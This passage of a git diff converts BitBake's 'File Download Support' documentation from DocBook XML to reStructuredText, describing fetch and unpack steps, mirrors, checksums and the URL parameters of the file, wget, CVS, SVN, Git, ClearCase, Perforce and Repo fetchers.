+The fetcher's temporary working directory is set by
+:term:`P4DIR`, which defaults to "DL_DIR/p4".
+The fetcher does not make use of a perforce client, instead it
+relies on ``p4 files`` to retrieve a list of
+files and ``p4 print`` to transfer the content
+of those files locally.
+
+To use this fetcher, make sure your recipe has proper
+:term:`SRC_URI`, :term:`SRCREV`, and
+:term:`PV` values. The p4 executable is able to use the
+config file defined by your system's ``P4CONFIG`` environment variable
+in order to define the Perforce server URL and port, username, and
+password if you do not wish to keep those values in a recipe itself. If
+you choose not to use ``P4CONFIG``, or to explicitly set variables that
+``P4CONFIG`` can contain, you can specify the ``P4PORT`` value, which is
+the server's URL and port number, and you can specify a username and
+password directly in your recipe within ``SRC_URI``.
+
+Here is an example that relies on ``P4CONFIG`` to specify the server URL
+and port, username, and password, and fetches the Head Revision: ::
+
+   SRC_URI = "p4://example-depot/main/source/..."
+   SRCREV = "${AUTOREV}"
+   PV = "p4-${SRCPV}"
+   S = "${WORKDIR}/p4"
+
+Here is an example that specifies the server URL and port, username, and
+password, and fetches a Revision based on a Label: ::
+
+   P4PORT = "tcp:p4server.example.net:1666"
+   SRC_URI = "p4://user:passwd@example-depot/main/source/..."
+   SRCREV = "release-1.0"
+   PV = "p4-${SRCPV}"
+   S = "${WORKDIR}/p4"
+
+.. note::
+
+   You should always set S to "${WORKDIR}/p4" in your recipe.
+
+.. _repo-fetcher:
+
+Repo Fetcher (``repo://``)
+--------------------------
+
+This fetcher submodule fetches code from ``google-repo`` source control
+system. The fetcher works by initiating and syncing sources of the
+repository into :term:`REPODIR`, which is usually
+``${DL_DIR}/repo``.
+
+This fetcher supports the following parameters:
+
+-  *"protocol":* Protocol to fetch the repository manifest (default:
+   git).
+
+-  *"branch":* Branch or tag of repository to get (default: master).
+
+-  *"manifest":* Name of the manifest file (default: ``default.xml``).
+
+Here are some example URLs: ::
+
+   SRC_URI = "repo://REPOROOT;protocol=git;branch=some_branch;manifest=my_manifest.xml"
+   SRC_URI = "repo://REPOROOT;protocol=file;branch=some_branch;manifest=my_manifest.xml"
+
+Other Fetchers
+--------------
+
+Fetch submodules also exist for the following:
+
+-  Bazaar (``bzr://``)
+
+-  Mercurial (``hg://``)
+
+-  npm (``npm://``)
+
+-  OSC (``osc://``)
+
+-  Secure FTP (``sftp://``)
+
+-  Secure Shell (``ssh://``)
+
+-  Trees using Git Annex (``gitannex://``)
+
+No documentation currently exists for these lesser used fetcher
+submodules. However, you might find the code helpful and readable.
+
+Auto Revisions
+==============
+
+We need to document ``AUTOREV`` and ``SRCREV_FORMAT`` here.
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.xml b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.xml
deleted file mode 100644
index d1bfc23362..0000000000
--- a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.xml
+++ /dev/null
@@ -1,868 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd">
-
-<chapter>
-<title>File Download Support</title>
-
-    <para>
-        BitBake's fetch module is a standalone piece of library code
-        that deals with the intricacies of downloading source code
-        and files from remote systems.
-        Fetching source code is one of the cornerstones of building software.
-        As such, this module forms an important part of BitBake.
-    </para>
-
-    <para>
-        The current fetch module is called "fetch2" and refers to the
-        fact that it is the second major version of the API.
-        The original version is obsolete and has been removed from the codebase.
-        Thus, in all cases, "fetch" refers to "fetch2" in this
-        manual.
-    </para>
-
-    <section id='the-download-fetch'>
-        <title>The Download (Fetch)</title>
-
-        <para>
-            BitBake takes several steps when fetching source code or files.
-            The fetcher codebase deals with two distinct processes in order:
-            obtaining the files from somewhere (cached or otherwise)
-            and then unpacking those files into a specific location and
-            perhaps in a specific way.
-            Getting and unpacking the files is often optionally followed
-            by patching.
-            Patching, however, is not covered by this module.
-        </para>
-
-        <para>
-            The code to execute the first part of this process, a fetch,
-            looks something like the following:
-            <literallayout class='monospaced'>
-     src_uri = (d.getVar('SRC_URI') or "").split()
-     fetcher = bb.fetch2.Fetch(src_uri, d)
-     fetcher.download()
-            </literallayout>
-            This code sets up an instance of the fetch class.
-            The instance uses a space-separated list of URLs from the
-            <link linkend='var-bb-SRC_URI'><filename>SRC_URI</filename></link>
-            variable and then calls the <filename>download</filename>
-            method to download the files.
-        </para>
-
-        <para>
-            The instantiation of the fetch class is usually followed by:
-            <literallayout class='monospaced'>
-     rootdir = l.getVar('WORKDIR')
-     fetcher.unpack(rootdir)
-            </literallayout>
-            This code unpacks the downloaded files to the
-            specified by <filename>WORKDIR</filename>.
-            <note>
-                For convenience, the naming in these examples matches
-                the variables used by OpenEmbedded.
-                If you want to see the above code in action, examine
-                the OpenEmbedded class file <filename>base.bbclass</filename>.
-            </note>
-            The <filename>SRC_URI</filename> and <filename>WORKDIR</filename>
-            variables are not hardcoded into the fetcher, since those fetcher
-            methods can be (and are) called with different variable names.
-            In OpenEmbedded for example, the shared state (sstate) code uses
-            the fetch module to fetch the sstate files.
-        </para>
-
-        <para>
-            When the <filename>download()</filename> method is called,
-            BitBake tries to resolve the URLs by looking for source files
-            in a specific search order:
-            <itemizedlist>
-                <listitem><para><emphasis>Pre-mirror Sites:</emphasis>
-                    BitBake first uses pre-mirrors to try and find source files.
-                    These locations are defined using the
-                    <link linkend='var-bb-PREMIRRORS'><filename>PREMIRRORS</filename></link>
-                    variable.
-                    </para></listitem>
-                <listitem><para><emphasis>Source URI:</emphasis>
-                    If pre-mirrors fail, BitBake uses the original URL (e.g from
-                    <filename>SRC_URI</filename>).
-                    </para></listitem>
-                <listitem><para><emphasis>Mirror Sites:</emphasis>
-                    If fetch failures occur, BitBake next uses mirror locations as
-                    defined by the
-                    <link linkend='var-bb-MIRRORS'><filename>MIRRORS</filename></link>
-                    variable.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            For each URL passed to the fetcher, the fetcher
-            calls the submodule that handles that particular URL type.
-            This behavior can be the source of some confusion when you
-            are providing URLs for the <filename>SRC_URI</filename>
-            variable.
-            Consider the following two URLs:
-            <literallayout class='monospaced'>
-     http://git.yoctoproject.org/git/poky;protocol=git
-     git://git.yoctoproject.org/git/poky;protocol=http
-            </literallayout>
-            In the former case, the URL is passed to the
-            <filename>wget</filename> fetcher, which does not
-            understand "git".
-            Therefore, the latter case is the correct form since the
-            Git fetcher does know how to use HTTP as a transport.
-        </para>
-
-        <para>
-            Here are some examples that show commonly used mirror
-            definitions:
-            <literallayout class='monospaced'>
-     PREMIRRORS ?= "\
-         bzr://.*/.*   http://somemirror.org/sources/ \n \
-         cvs://.*/.*   http://somemirror.org/sources/ \n \
-         git://.*/.*   http://somemirror.org/sources/ \n \
-         hg://.*/.*    http://somemirror.org/sources/ \n \
-         osc://.*/.*   http://somemirror.org/sources/ \n \
-         p4://.*/.*    http://somemirror.org/sources/ \n \
-         svn://.*/.*   http://somemirror.org/sources/ \n"
-
-     MIRRORS =+ "\
-         ftp://.*/.*      http://somemirror.org/sources/ \n \
-         http://.*/.*     http://somemirror.org/sources/ \n \
-         https://.*/.*    http://somemirror.org/sources/ \n"
-            </literallayout>
-            It is useful to note that BitBake supports
-            cross-URLs.
-            It is possible to mirror a Git repository on an HTTP
-            server as a tarball.
-            This is what the <filename>git://</filename> mapping in
-            the previous example does.
-        </para>
-
-        <para>
-            Since network accesses are slow, BitBake maintains a
-            cache of files downloaded from the network.
-            Any source files that are not local (i.e.
-            downloaded from the Internet) are placed into the download
-            directory, which is specified by the
-            <link linkend='var-bb-DL_DIR'><filename>DL_DIR</filename></link>
-            variable.
-        </para>
-
-        <para>
-            File integrity is of key importance for reproducing builds.
-            For non-local archive downloads, the fetcher code can verify
-            SHA-256 and MD5 checksums to ensure the archives have been
-            downloaded correctly.
-            You can specify these checksums by using the
-            <filename>SRC_URI</filename> variable with the appropriate
-            varflags as follows:
-            <literallayout class='monospaced'>
-     SRC_URI[md5sum] = "<replaceable>value</replaceable>"
-     SRC_URI[sha256sum] = "<replaceable>value</replaceable>"
-            </literallayout>
-            You can also specify the checksums as parameters on the
-            <filename>SRC_URI</filename> as shown below:
-            <literallayout class='monospaced'>
-     SRC_URI = "http://example.com/foobar.tar.bz2;md5sum=4a8e0f237e961fd7785d19d07fdb994d"
-            </literallayout>
-            If multiple URIs exist, you can specify the checksums either
-            directly as in the previous example, or you can name the URLs.
-            The following syntax shows how you name the URIs:
-            <literallayout class='monospaced'>
-     SRC_URI = "http://example.com/foobar.tar.bz2;name=foo"
-     SRC_URI[foo.md5sum] = 4a8e0f237e961fd7785d19d07fdb994d
-            </literallayout>
-            After a file has been downloaded and has had its checksum checked,
-            a ".done" stamp is placed in <filename>DL_DIR</filename>.
-            BitBake uses this stamp during subsequent builds to avoid
-            downloading or comparing a checksum for the file again.
-            <note>
-                It is assumed that local storage is safe from data corruption.
-                If this were not the case, there would be bigger issues to worry about.
-            </note>
-        </para>
-
-        <para>
-            If
-            <link linkend='var-bb-BB_STRICT_CHECKSUM'><filename>BB_STRICT_CHECKSUM</filename></link>
-            is set, any download without a checksum triggers an
-            error message.
-            The
-            <link linkend='var-bb-BB_NO_NETWORK'><filename>BB_NO_NETWORK</filename></link>
-            variable can be used to make any attempted network access a fatal
-            error, which is useful for checking that mirrors are complete
-            as well as other things.
-        </para>
-    </section>
-
-    <section id='bb-the-unpack'>
-        <title>The Unpack</title>
-
-        <para>
-            The unpack process usually immediately follows the download.
-            For all URLs except Git URLs, BitBake uses the common
-            <filename>unpack</filename> method.
-        </para>
-
-        <para>
-            A number of parameters exist that you can specify within the
-            URL to govern the behavior of the unpack stage:
-            <itemizedlist>
-                <listitem><para><emphasis>unpack:</emphasis>
-                    Controls whether the URL components are unpacked.
-                    If set to "1", which is the default, the components
-                    are unpacked.
-                    If set to "0", the unpack stage leaves the file alone.
-                    This parameter is useful when you want an archive to be
-                    copied in and not be unpacked.
-                    </para></listitem>
-                <listitem><para><emphasis>dos:</emphasis>
-                    Applies to <filename>.zip</filename> and
-                    <filename>.jar</filename> files and specifies whether to
-                    use DOS line ending conversion on text files.
-                    </para></listitem>
-                <listitem><para><emphasis>basepath:</emphasis>
-                    Instructs the unpack stage to strip the specified
-                    directories from the source path when unpacking.
-                    </para></listitem>
-                <listitem><para><emphasis>subdir:</emphasis>
-                    Unpacks the specific URL to the specified subdirectory
-                    within the root directory.
-                    </para></listitem>
-            </itemizedlist>
-            The unpack call automatically decompresses and extracts files
-            with ".Z", ".z", ".gz", ".xz", ".zip", ".jar", ".ipk", ".rpm".
-            ".srpm", ".deb" and ".bz2" extensions as well as various combinations
-            of tarball extensions.
-        </para>
-
-        <para>
-            As mentioned, the Git fetcher has its own unpack method that
-            is optimized to work with Git trees.
-            Basically, this method works by cloning the tree into the final
-            directory.
-            The process is completed using references so that there is
-            only one central copy of the Git metadata needed.
-        </para>
-    </section>
-
-    <section id='bb-fetchers'>
-        <title>Fetchers</title>
-
-        <para>
-            As mentioned earlier, the URL prefix determines which
-            fetcher submodule BitBake uses.
-            Each submodule can support different URL parameters,
-            which are described in the following sections.
-        </para>
-
-        <section id='local-file-fetcher'>
-            <title>Local file fetcher (<filename>file://</filename>)</title>
-
-            <para>
-                This submodule handles URLs that begin with
-                <filename>file://</filename>.
-                The filename you specify within the URL can be
-                either an absolute or relative path to a file.
-                If the filename is relative, the contents of the
-                <link linkend='var-bb-FILESPATH'><filename>FILESPATH</filename></link>
-                variable is used in the same way
-                <filename>PATH</filename> is used to find executables.
-                If the file cannot be found, it is assumed that it is available in
-                <link linkend='var-bb-DL_DIR'><filename>DL_DIR</filename></link>
-                by the time the <filename>download()</filename> method is called.
-            </para>
-
-            <para>
-                If you specify a directory, the entire directory is
-                unpacked.
-            </para>
-
-            <para>
-                Here are a couple of example URLs, the first relative and
-                the second absolute:
-                <literallayout class='monospaced'>
-     SRC_URI = "file://relativefile.patch"
-     SRC_URI = "file:///Users/ich/very_important_software"
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='http-ftp-fetcher'>
-            <title>HTTP/FTP wget fetcher (<filename>http://</filename>, <filename>ftp://</filename>, <filename>https://</filename>)</title>
-
-            <para>
-                This fetcher obtains files from web and FTP servers.
-                Internally, the fetcher uses the wget utility.
-            </para>
-
-            <para>
-                The executable and parameters used are specified by the
-                <filename>FETCHCMD_wget</filename> variable, which defaults
-                to sensible values.
-                The fetcher supports a parameter "downloadfilename" that
-                allows the name of the downloaded file to be specified.
-                Specifying the name of the downloaded file is useful
-                for avoiding collisions in
-                <link linkend='var-bb-DL_DIR'><filename>DL_DIR</filename></link>
-                when dealing with multiple files that have the same name.
-            </para>
-
-            <para>
-                Some example URLs are as follows:
-                <literallayout class='monospaced'>
-     SRC_URI = "http://oe.handhelds.org/not_there.aac"
-     SRC_URI = "ftp://oe.handhelds.org/not_there_as_well.aac"
-     SRC_URI = "ftp://you@oe.handhelds.org/home/you/secret.plan"
-                </literallayout>
-            </para>
-            <note>
-               Because URL parameters are delimited by semi-colons, this can
-               introduce ambiguity when parsing URLs that also contain semi-colons,
-               for example:
-                <literallayout class='monospaced'>
-     SRC_URI = "http://abc123.org/git/?p=gcc/gcc.git;a=snapshot;h=a5dd47"
-                </literallayout>
-               Such URLs should should be modified by replacing semi-colons with '&amp;' characters:
-               <literallayout class='monospaced'>
-     SRC_URI = "http://abc123.org/git/?p=gcc/gcc.git&amp;a=snapshot&amp;h=a5dd47"
-                </literallayout>
-                In most cases this should work. Treating semi-colons and '&amp;' in queries
-                identically is recommended by the World Wide Web Consortium (W3C).
-                Note that due to the nature of the URL, you may have to specify the name
-                of the downloaded file as well:
-              <literallayout class='monospaced'>
-     SRC_URI = "http://abc123.org/git/?p=gcc/gcc.git&amp;a=snapshot&amp;h=a5dd47;downloadfilename=myfile.bz2"
-                </literallayout>
-            </note>
-        </section>
-
-        <section id='cvs-fetcher'>
-            <title>CVS fetcher (<filename>(cvs://</filename>)</title>
-
-            <para>
-                This submodule handles checking out files from the
-                CVS version control system.
-                You can configure it using a number of different variables:
-                <itemizedlist>
-                    <listitem><para><emphasis><filename>FETCHCMD_cvs</filename>:</emphasis>
-                        The name of the executable to use when running
-                        the <filename>cvs</filename> command.
-                        This name is usually "cvs".
-                        </para></listitem>
-                    <listitem><para><emphasis><filename>SRCDATE</filename>:</emphasis>
-                        The date to use when fetching the CVS source code.
-                        A special value of "now" causes the checkout to
-                        be updated on every build.
-                        </para></listitem>
-                    <listitem><para><emphasis><link linkend='var-bb-CVSDIR'><filename>CVSDIR</filename></link>:</emphasis>
-                        Specifies where a temporary checkout is saved.
-                        The location is often <filename>DL_DIR/cvs</filename>.
-                        </para></listitem>
-                    <listitem><para><emphasis><filename>CVS_PROXY_HOST</filename>:</emphasis>
-                        The name to use as a "proxy=" parameter to the
-                        <filename>cvs</filename> command.
-                        </para></listitem>
-                    <listitem><para><emphasis><filename>CVS_PROXY_PORT</filename>:</emphasis>
-                        The port number to use as a "proxyport=" parameter to
-                        the <filename>cvs</filename> command.
-                        </para></listitem>
-                </itemizedlist>
-                As well as the standard username and password URL syntax,
-                you can also configure the fetcher with various URL parameters:
-            </para>
-
-            <para>
-                The supported parameters are as follows:
-                <itemizedlist>
-                    <listitem><para><emphasis>"method":</emphasis>
-                        The protocol over which to communicate with the CVS
-                        server.
-                        By default, this protocol is "pserver".
-                        If "method" is set to "ext", BitBake examines the
-                        "rsh" parameter and sets <filename>CVS_RSH</filename>.
-                        You can use "dir" for local directories.
-                        </para></listitem>
-                    <listitem><para><emphasis>"module":</emphasis>
-                        Specifies the module to check out.
-                        You must supply this parameter.
-                        </para></listitem>
-                    <listitem><para><emphasis>"tag":</emphasis>
-                        Describes which CVS TAG should be used for
-                        the checkout.
-                        By default, the TAG is empty.
-                        </para></listitem>
-                    <listitem><para><emphasis>"date":</emphasis>
-                        Specifies a date.
-                        If no "date" is specified, the
-                        <link linkend='var-bb-SRCDATE'><filename>SRCDATE</filename></link>
-                        of the configuration is used to checkout a specific date.
-                        The special value of "now" causes the checkout to be
-                        updated on every build.
-                        </para></listitem>
-                    <listitem><para><emphasis>"localdir":</emphasis>
-                        Used to rename the module.
-                        Effectively, you are renaming the output directory
-                        to which the module is unpacked.
-                        You are forcing the module into a special
-                        directory relative to
-                        <link linkend='var-bb-CVSDIR'><filename>CVSDIR</filename></link>.
-                        </para></listitem>
-                    <listitem><para><emphasis>"rsh"</emphasis>
-                        Used in conjunction with the "method" parameter.
-                        </para></listitem>
-                    <listitem><para><emphasis>"scmdata":</emphasis>
-                        Causes the CVS metadata to be maintained in the tarball
-                        the fetcher creates when set to "keep".
-                        The tarball is expanded into the work directory.
-                        By default, the CVS metadata is removed.
-                        </para></listitem>
-                    <listitem><para><emphasis>"fullpath":</emphasis>
-                        Controls whether the resulting checkout is at the
-                        module level, which is the default, or is at deeper
-                        paths.
-                        </para></listitem>
-                    <listitem><para><emphasis>"norecurse":</emphasis>
-                        Causes the fetcher to only checkout the specified
-                        directory with no recurse into any subdirectories.
-                        </para></listitem>
-                    <listitem><para><emphasis>"port":</emphasis>
-                        The port to which the CVS server connects.
-                        </para></listitem>
-                </itemizedlist>
-                Some example URLs are as follows:
-                <literallayout class='monospaced'>
-     SRC_URI = "cvs://CVSROOT;module=mymodule;tag=some-version;method=ext"
-     SRC_URI = "cvs://CVSROOT;module=mymodule;date=20060126;localdir=usethat"
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='svn-fetcher'>
-            <title>Subversion (SVN) Fetcher (<filename>svn://</filename>)</title>
-
-            <para>
-                This fetcher submodule fetches code from the
-                Subversion source control system.
-                The executable used is specified by
-                <filename>FETCHCMD_svn</filename>, which defaults
-                to "svn".
-                The fetcher's temporary working directory is set by
-                <link linkend='var-bb-SVNDIR'><filename>SVNDIR</filename></link>,
-                which is usually <filename>DL_DIR/svn</filename>.
-            </para>
-
-            <para>
-                The supported parameters are as follows:
-                <itemizedlist>
-                    <listitem><para><emphasis>"module":</emphasis>
-                        The name of the svn module to checkout.
-                        You must provide this parameter.
-                        You can think of this parameter as the top-level
-                        directory of the repository data you want.
-                        </para></listitem>
-                    <listitem><para><emphasis>"path_spec":</emphasis>
-                        A specific directory in which to checkout the
-                        specified svn module.
-                        </para></listitem>
-                    <listitem><para><emphasis>"protocol":</emphasis>
-                        The protocol to use, which defaults to "svn".
-                        If "protocol" is set to "svn+ssh", the "ssh"
-                        parameter is also used.
-                        </para></listitem>
-                    <listitem><para><emphasis>"rev":</emphasis>
-                        The revision of the source code to checkout.
-                        </para></listitem>
-                    <listitem><para><emphasis>"scmdata":</emphasis>
-                        Causes the “.svn� directories to be available during
-                        compile-time when set to "keep".
-                        By default, these directories are removed.
-                        </para></listitem>
-                    <listitem><para><emphasis>"ssh":</emphasis>
-                        An optional parameter used when "protocol" is set
-                        to "svn+ssh".
-                        You can use this parameter to specify the ssh
-                        program used by svn.
-                        </para></listitem>
-                    <listitem><para><emphasis>"transportuser":</emphasis>
-                        When required, sets the username for the transport.
-                        By default, this parameter is empty.
-                        The transport username is different than the username
-                        used in the main URL, which is passed to the subversion
-                        command.
-                        </para></listitem>
-                </itemizedlist>
-                Following are three examples using svn:
-                <literallayout class='monospaced'>
-     SRC_URI = "svn://myrepos/proj1;module=vip;protocol=http;rev=667"
-     SRC_URI = "svn://myrepos/proj1;module=opie;protocol=svn+ssh"
-     SRC_URI = "svn://myrepos/proj1;module=trunk;protocol=http;path_spec=${MY_DIR}/proj1"
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='git-fetcher'>
-            <title>Git Fetcher (<filename>git://</filename>)</title>
-
-            <para>
-                This fetcher submodule fetches code from the Git
-                source control system.
-                The fetcher works by creating a bare clone of the
-                remote into
-                <link linkend='var-bb-GITDIR'><filename>GITDIR</filename></link>,
-                which is usually <filename>DL_DIR/git2</filename>.
-                This bare clone is then cloned into the work directory during the
-                unpack stage when a specific tree is checked out.
-                This is done using alternates and by reference to
-                minimize the amount of duplicate data on the disk and
-                make the unpack process fast.
-                The executable used can be set with
-                <filename>FETCHCMD_git</filename>.
-            </para>
-
-            <para>
-                This fetcher supports the following parameters:
-                <itemizedlist>
-                    <listitem><para><emphasis>"protocol":</emphasis>
-                        The protocol used to fetch the files.
-                        The default is "git" when a hostname is set.
-                        If a hostname is not set, the Git protocol is "file".
-                        You can also use "http", "https", "ssh" and "rsync".
-                        </para></listitem>
-                    <listitem><para><emphasis>"nocheckout":</emphasis>
-                        Tells the fetcher to not checkout source code when
-                        unpacking when set to "1".
-                        Set this option for the URL where there is a custom
-                        routine to checkout code.
-                        The default is "0".
-                        </para></listitem>
-                    <listitem><para><emphasis>"rebaseable":</emphasis>
-                        Indicates that the upstream Git repository can be rebased.
-                        You should set this parameter to "1" if
-                        revisions can become detached from branches.
-                        In this case, the source mirror tarball is done per
-                        revision, which has a loss of efficiency.
-                        Rebasing the upstream Git repository could cause the
-                        current revision to disappear from the upstream repository.
-                        This option reminds the fetcher to preserve the local cache
-                        carefully for future use.
-                        The default value for this parameter is "0".
-                        </para></listitem>
-                    <listitem><para><emphasis>"nobranch":</emphasis>
-                        Tells the fetcher to not check the SHA validation
-                        for the branch when set to "1".
-                        The default is "0".
-                        Set this option for the recipe that refers to
-                        the commit that is valid for a tag instead of
-                        the branch.
-                        </para></listitem>
-                    <listitem><para><emphasis>"bareclone":</emphasis>
-                        Tells the fetcher to clone a bare clone into the
-                        destination directory without checking out a working tree.
-                        Only the raw Git metadata is provided.
-                        This parameter implies the "nocheckout" parameter as well.
-                        </para></listitem>
-                    <listitem><para><emphasis>"branch":</emphasis>
-                        The branch(es) of the Git tree to clone.
-                        If unset, this is assumed to be "master".
-                        The number of branch parameters much match the number of
-                        name parameters.
-                        </para></listitem>
-                    <listitem><para><emphasis>"rev":</emphasis>
-                        The revision to use for the checkout.
-                        The default is "master".
-                        </para></listitem>
-                    <listitem><para><emphasis>"tag":</emphasis>
-                        Specifies a tag to use for the checkout.
-                        To correctly resolve tags, BitBake must access the
-                        network.
-                        For that reason, tags are often not used.
-                        As far as Git is concerned, the "tag" parameter behaves
-                        effectively the same as the "rev" parameter.
-                        </para></listitem>
-                    <listitem><para><emphasis>"subpath":</emphasis>
-                        Limits the checkout to a specific subpath of the tree.
-                        By default, the whole tree is checked out.
-                        </para></listitem>
-                    <listitem><para><emphasis>"destsuffix":</emphasis>
-                        The name of the path in which to place the checkout.
-                        By default, the path is <filename>git/</filename>.
-                        </para></listitem>
-                    <listitem><para><emphasis>"usehead":</emphasis>
-                        Enables local <filename>git://</filename> URLs to use the
-                        current branch HEAD as the revision for use with
-                        <filename>AUTOREV</filename>.
-                        The "usehead" parameter implies no branch and only works
-                        when the transfer protocol is
-                        <filename>file://</filename>.
-                        </para></listitem>
-                </itemizedlist>
-                Here are some example URLs:
-                <literallayout class='monospaced'>
-     SRC_URI = "git://git.oe.handhelds.org/git/vip.git;tag=version-1"
-     SRC_URI = "git://git.oe.handhelds.org/git/vip.git;protocol=http"
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='gitsm-fetcher'>
-            <title>Git Submodule Fetcher (<filename>gitsm://</filename>)</title>
-
-            <para>
-                This fetcher submodule inherits from the
-                <link linkend='git-fetcher'>Git fetcher</link> and extends
-                that fetcher's behavior by fetching a repository's submodules.
-                <link linkend='var-bb-SRC_URI'><filename>SRC_URI</filename></link>
-                is passed to the Git fetcher as described in the
-                "<link linkend='git-fetcher'>Git Fetcher (<filename>git://</filename>)</link>"
-                section.
-                <note>
-                    <title>Notes and Warnings</title>
-                    <para>
-                        You must clean a recipe when switching between
-                        '<filename>git://</filename>' and
-                        '<filename>gitsm://</filename>' URLs.
-                    </para>
-
-                    <para>
-                        The Git Submodules fetcher is not a complete fetcher
-                        implementation.
-                        The fetcher has known issues where it does not use the
-                        normal source mirroring infrastructure properly. Further,
-                        the submodule sources it fetches are not visible to the
-                        licensing and source archiving infrastructures.
-                    </para>
-                </note>
-            </para>
-        </section>
-
-        <section id='clearcase-fetcher'>
-            <title>ClearCase Fetcher (<filename>ccrc://</filename>)</title>
-
-            <para>
-                This fetcher submodule fetches code from a
-                <ulink url='http://en.wikipedia.org/wiki/Rational_ClearCase'>ClearCase</ulink>
-                repository.
-            </para>
-
-            <para>
-                To use this fetcher, make sure your recipe has proper
-                <link linkend='var-bb-SRC_URI'><filename>SRC_URI</filename></link>,
-                <link linkend='var-bb-SRCREV'><filename>SRCREV</filename></link>, and
-                <link linkend='var-bb-PV'><filename>PV</filename></link> settings.
-                Here is an example:
-                <literallayout class='monospaced'>
-     SRC_URI = "ccrc://cc.example.org/ccrc;vob=/example_vob;module=/example_module"
-     SRCREV = "EXAMPLE_CLEARCASE_TAG"
-     PV = "${@d.getVar("SRCREV", False).replace("/", "+")}"
-                </literallayout>
-                The fetcher uses the <filename>rcleartool</filename> or
-                <filename>cleartool</filename> remote client, depending on
-                which one is available.
-            </para>
-
-            <para>
-                Following are options for the <filename>SRC_URI</filename>
-                statement:
-                <itemizedlist>
-                    <listitem><para><emphasis><filename>vob</filename></emphasis>:
-                        The name, which must include the
-                        prepending "/" character, of the ClearCase VOB.
-                        This option is required.
-                        </para></listitem>
-                    <listitem><para><emphasis><filename>module</filename></emphasis>:
-                        The module, which must include the
-                        prepending "/" character, in the selected VOB.
-                        <note>
-                            The <filename>module</filename> and <filename>vob</filename>
-                            options are combined to create the <filename>load</filename> rule in
-                            the view config spec.
-                            As an example, consider the <filename>vob</filename> and
-                            <filename>module</filename> values from the
-                            <filename>SRC_URI</filename> statement at the start of this section.
-                            Combining those values results in the following:
-                            <literallayout class='monospaced'>
-     load /example_vob/example_module
-                            </literallayout>
-                        </note>
-                        </para></listitem>
-                    <listitem><para><emphasis><filename>proto</filename></emphasis>:
-                        The protocol, which can be either <filename>http</filename> or
-                        <filename>https</filename>.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                By default, the fetcher creates a configuration specification.
-                If you want this specification written to an area other than the default,
-                use the <filename>CCASE_CUSTOM_CONFIG_SPEC</filename> variable
-                in your recipe to define where the specification is written.
-                <note>
-                    the <filename>SRCREV</filename> loses its functionality if you
-                    specify this variable.
-                    However, <filename>SRCREV</filename> is still used to label the
-                    archive after a fetch even though it does not define what is
-                    fetched.
-                </note>
-            </para>
-
-            <para>
-                Here are a couple of other behaviors worth mentioning:
-                <itemizedlist>
-                    <listitem><para>
-                        When using <filename>cleartool</filename>, the login of
-                        <filename>cleartool</filename> is handled by the system.
-                        The login require no special steps.
-                        </para></listitem>
-                    <listitem><para>
-                        In order to use <filename>rcleartool</filename> with authenticated
-                        users, an "rcleartool login" is necessary before using the fetcher.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='perforce-fetcher'>
-            <title>Perforce Fetcher (<filename>p4://</filename>)</title>
-
-            <para>
-                This fetcher submodule fetches code from the
-                <ulink url='https://www.perforce.com/'>Perforce</ulink>
-                source control system.
-                The executable used is specified by
-                <filename>FETCHCMD_p4</filename>, which defaults
-                to "p4".
-                The fetcher's temporary working directory is set by
-                <link linkend='var-bb-P4DIR'><filename>P4DIR</filename></link>,
-                which defaults to "DL_DIR/p4".
-            </para>
-
-            <para>
-                To use this fetcher, make sure your recipe has proper
-                <link linkend='var-bb-SRC_URI'><filename>SRC_URI</filename></link>,
-                <link linkend='var-bb-SRCREV'><filename>SRCREV</filename></link>, and
-                <link linkend='var-bb-PV'><filename>PV</filename></link> values.
-                The p4 executable is able to use the config file defined by your
-                system's <filename>P4CONFIG</filename> environment variable in
-                order to define the Perforce server URL and port, username, and
-                password if you do not wish to keep those values in a recipe
-                itself.
-                If you choose not to use <filename>P4CONFIG</filename>,
-                or to explicitly set variables that <filename>P4CONFIG</filename>
-                can contain, you can specify the <filename>P4PORT</filename> value,
-                which is the server's URL and port number, and you can
-                specify a username and password directly in your recipe within
-                <filename>SRC_URI</filename>.
-            </para>
-
-            <para>
-                Here is an example that relies on <filename>P4CONFIG</filename>
-                to specify the server URL and port, username, and password, and
-                fetches the Head Revision:
-                <literallayout class='monospaced'>
-    SRC_URI = "p4://example-depot/main/source/..."
-    SRCREV = "${AUTOREV}"
-    PV = "p4-${SRCPV}"
-    S = "${WORKDIR}/p4"
-                </literallayout>
-            </para>
-
-            <para>
-                Here is an example that specifies the server URL and port,
-                username, and password, and fetches a Revision based on a Label:
-                <literallayout class='monospaced'>
-    P4PORT = "tcp:p4server.example.net:1666"
-    SRC_URI = "p4://user:passwd@example-depot/main/source/..."
-    SRCREV = "release-1.0"
-    PV = "p4-${SRCPV}"
-    S = "${WORKDIR}/p4"
-                </literallayout>
-                <note>
-                    You should always set <filename>S</filename>
-                    to <filename>"${WORKDIR}/p4"</filename> in your recipe.
-                </note>
-            </para>
-        </section>
-
-        <section id='repo-fetcher'>
-            <title>Repo Fetcher (<filename>repo://</filename>)</title>
-
-            <para>
-                This fetcher submodule fetches code from
-                <filename>google-repo</filename> source control system.
-                The fetcher works by initiating and syncing sources of the
-                repository into
-                <link linkend='var-bb-REPODIR'><filename>REPODIR</filename></link>,
-                which is usually
-                <link linkend='var-bb-DL_DIR'><filename>DL_DIR</filename></link><filename>/repo</filename>.
-            </para>
-
-            <para>
-                This fetcher supports the following parameters:
-                <itemizedlist>
-                    <listitem><para>
-                        <emphasis>"protocol":</emphasis>
-                        Protocol to fetch the repository manifest (default: git).
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>"branch":</emphasis>
-                        Branch or tag of repository to get (default: master).
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>"manifest":</emphasis>
-                        Name of the manifest file (default: <filename>default.xml</filename>).
-                        </para></listitem>
-                </itemizedlist>
-                Here are some example URLs:
